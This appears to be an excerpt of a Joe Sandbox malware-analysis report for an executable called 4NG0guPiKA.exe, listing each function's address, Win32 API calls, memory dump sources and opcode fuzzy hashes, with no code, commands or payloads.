                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                            • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                                            • Opcode Fuzzy Hash: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                            • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                            • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                                            • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                            • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                                            Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                            • Instruction ID: 4da21f5269aa326e6de85e385cb401583d451f1930efd1289825586750b78c36
                                                                                                            • Opcode Fuzzy Hash: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                            • Instruction Fuzzy Hash: 84E08CB2B04104DBDB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C008E3E
                                                                                                            Function 00405B56 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\4NG0guPiKA.exe,80000000,00000003), ref: 00405B5A
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                            • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                            • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                            • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                            Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                              • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                            • Instruction ID: 7b0a8f507568a188bd2c0a80d79ed85a493e53c174130335dce059ea839ee6d0
                                                                                                            • Opcode Fuzzy Hash: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                            • Instruction Fuzzy Hash: 13E01AB1B15114ABDB01ABE59D49CEEB66DEB00319F20043BF101B00D1C27989019E7E
                                                                                                            Function 00402253 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 390214022-0
                                                                                                            • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                            • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                            • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                            • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                            Function 00401718 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PathSearch
                                                                                                            • String ID:
                                                                                                            • API String ID: 2203818243-0
                                                                                                            • Opcode ID: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                            • Instruction ID: f28d117729d6db308ba67ea043928a1e47cb3974c8f3bd2f87491376c6cbdc89
                                                                                                            • Opcode Fuzzy Hash: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                            • Instruction Fuzzy Hash: 73E048B2314200AAD710DFA5DE48EEA776CDB0036CF304676E611A61D0D2B45A41D72D
                                                                                                            Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,000001FC,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                            • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                            • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                            • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                            Function 00405BD9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                            • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                            • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                            • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                            Function 1000278D Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                                            Function 00404164 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                            • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                            • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                            • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                            Function 0040330F Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1568483788.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1568451911.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568499837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568513527.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1568594892.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                            • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                            • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                            • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                            Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1575114385.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1575078403.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575136466.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1575158059.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_4NG0guPiKA.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                            • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                            • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                            • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638

                                                                                                            Non-executed Functions

                                                                                                            Function 004052D3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                              • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                            • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                            • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                            • CreatePopupMenu.USER32 ref: 00405562
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405596
